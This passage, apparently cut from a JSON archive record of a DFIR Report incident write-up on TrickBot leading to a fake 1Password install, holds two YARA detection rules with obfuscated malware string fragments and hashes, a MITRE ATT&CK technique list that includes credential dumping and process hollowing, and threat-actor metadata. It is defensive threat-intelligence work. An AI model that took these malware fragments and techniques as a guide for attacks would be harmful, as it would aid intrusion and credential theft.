DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-08-15\"\r\nhash1 = \"d9e8440665f37ae16b60ba912c540ba1f689c8ef7454defbdbf6ce7d776b8e24\"\r\nstrings:\r\n$s1 = \"%oveqxh%%qvgs%%siksf%%dlxh%%mdiry%%bkpy%%eluai%%cnvepu%%gpwfty%%bkpy%%jvfkra%%irckvi%%gpxipg%%veoamv%%v\r\n$s2 = \"%oveqxh%%qvgs%%siksf%%dlxh%%mdiry%%bkpy%%eluai%%cnvepu%%gpwfty%%bkpy%%jvfkra%%irckvi%%gpxipg%%veoamv%%v\r\n$s3 = \"%nhmveo%%siksf%irckvi%aqvmr%d\" fullword ascii\r\n$s4 = \"bgobkp%%owing%%eqxo%%irckvi%%gobk%%gwcnve%%fryrww%%najafo%%cnvepu%%wgnvi%%amwen%%gpxipg%%pgpu%%cnvepu%\"\r\n$s5 = \"%nhmveo% siksf= \" fullword ascii\r\n$s6 = \"%nhmveo%%siksf%gpuc%aqvmr%Ap\" fullword ascii\r\n$s7 = \"%nhmveo%%siksf%aqvmr==\" fullword ascii\r\n$s8 = \"%nhmveo%%siksf%mdiry%aqvmr%:\" fullword ascii\r\n$s9 = \"%nhmveo%%siksf%gpxipg%aqvmr%.\" fullword ascii\r\n$s10 = \"%nhmveo%%siksf%owing%aqvmr%7f\" fullword ascii\r\n$s11 = \"%nhmveo%%siksf%bgobkp%aqvmr%659\" fullword ascii\r\n$s12 = \"%nhmveo%%siksf%ygob%aqvmr%D\" fullword ascii\r\n$s13 = \"%nhmveo%%siksf%pgpu%aqvmr%ex\" fullword ascii\r\n$s14 = \"%nhmveo%%siksf%otmrb%aqvmr%l\" fullword ascii\r\n$s15 = \"%nhmveo%%siksf%wclsbn%aqvmr%iMe\" fullword ascii\r\n$s16 = \"%nhmveo%%siksf%qvgs%aqvmr%rt\" fullword ascii\r\n$s17 = \"%nhmveo%%siksf%udpwpu%aqvmr%pD\" fullword ascii\r\n$s18 = \"%nhmveo%%siksf%najafo%aqvmr%22c\" fullword ascii\r\n$s19 = \"%nhmveo%%siksf%fryrww%aqvmr%d4d\" fullword ascii\r\n$s20 = \"%nhmveo%%siksf%ensen%aqvmr%ee\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x6573 and filesize \u003c 4KB and\r\n8 of them\r\n}\r\nrule case_4778_1a5f3ca6597fcccd3295ead4d22ce70b {\r\nmeta:\r\ndescription = \"files - file 1a5f3ca6597fcccd3295ead4d22ce70b.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-08-15\"\r\nhash1 = \"7501da197ff9bcd49198dce9cf668442b3a04122d1034effb29d74e0a09529d7\"\r\nstrings:\r\n$s1 = \"addconsole.dll\" fullword wide\r\n$s2 = \"C:\\\\Wrk\\\\mFiles\\\\86\\\\1\\\\Release\\\\addconsole.pdb\" fullword ascii\r\n$s3 = \"\u003e-\u003e3\u003eD\u003e}\u003e\" fullword ascii /* hex encoded string '=' */\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 20 of 21\n\n$s4 = \"kmerjgyuhwjvueruewghgsdpdeo\" fullword ascii\r\n$s5 = \"~DMUlA].JVJ,[2^\u003eO\" fullword ascii\r\n$s6 = \"xgF.lxh\" fullword ascii\r\n$s7 = \"2.0.0.11\" fullword wide\r\n$s8 = \"aripwx\" fullword ascii\r\n$s9 = \"YwTjoq1\" fullword ascii\r\n$s10 = \"LxDgEm0\" fullword ascii\r\n$s11 = \"rvrpsn\" fullword ascii\r\n$s12 = \"qb\\\"CTUAA~.\" fullword ascii\r\n$s13 = \":,7;\\\"/1/= 1!'4'(\u0026*?/:--(-(!1(\u00269JVJVMO\\\\JBSBS[UBT_JHC@GLZMA\\\\QKUKVj{oi~m~ppeqdww~{bk\" fullword ascii\r\n$s14 = \":,(9,=1?$2%06=:=*\u003c'+2?!?-00!17$7XVZO_J]]X]XQAXVIZFZF]_LZRCRCKERDozxspw|j}qla{e{fzk\" fullword ascii\r\n$s15 = \"Time New Roman\" fullword ascii\r\n$s16 = \"gL:hdwKR8T\" fullword ascii\r\n$s17 = \"NwQvL?_\" fullword ascii\r\n$s18 = \"TEAqQ\u003eW/\" fullword ascii\r\n$s19 = \"+mnHy\u003cm8\" fullword ascii\r\n$s20 = \"uTVWh-F@\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"ae9182174b5c4afd59b9b6502df5d8a1\" or 8 of them )\r\n}\r\nMITRE \r\nT1055.012 – Process Injection: Process Hollowing \r\nT1053.005 – Scheduled Task/Job: Scheduled Task \r\nT1059.001 – Command and Scripting Interpreter: PowerShell  \r\nT1071.001 – Application Layer Protocol: Web Protocols \r\nT1003.001 – OS Credential Dumping: LSASS Memory \r\nT1444 – Masquerade as Legitimate Application  \r\nT1069 – Permission Groups Discovery \r\nT1018 – Remote System Discovery \r\nT1082 – System Information Discovery \r\nT1016 – System Network Configuration Discovery \r\nT1033 – System Owner/User Discovery \r\nT1482 – Domain Trust Discovery \r\nT1134 – Access Token Manipulation \r\nT1105 – Ingress Tool Transfer \r\nT1046 – Network Service Scanning \r\nT1047 – Windows Management Instrumentation \r\nInternal case #4778 \r\nSource: https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/"
	],
	"report_names": [
		"trickbot-leads-up-to-fake-1password-installation"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434885,
	"ts_updated_at": 1775791229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a87f3838ccb83a662cb6942ae497605be74aeacb.pdf",
		"text": "https://archive.orkl.eu/a87f3838ccb83a662cb6942ae497605be74aeacb.txt",
		"img": "https://archive.orkl.eu/a87f3838ccb83a662cb6942ae497605be74aeacb.jpg"
	}
}